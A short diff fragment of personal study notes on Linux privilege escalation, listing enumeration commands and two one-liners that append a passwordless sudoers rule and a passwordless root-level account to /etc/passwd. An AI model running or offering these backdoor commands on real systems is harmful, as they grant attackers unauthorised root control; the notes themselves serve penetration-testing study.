kolbyn24/Notes/03 - Content/Linux Privilege Escalation.md

 `mount`
 `/bin/lsblk`

+**What processes and services are running?
+Which are running as root?
+`ps –ef
+`ps –ef | grep root

 **Scripts that can be used if they run as root:
 `echo “user ALL=(ALL) NOPASSWD:ALL” >> /etc/sudoers
 `echo “user::0:0:System Administrator:/root/root:/bin/bash” >> /etc/passwd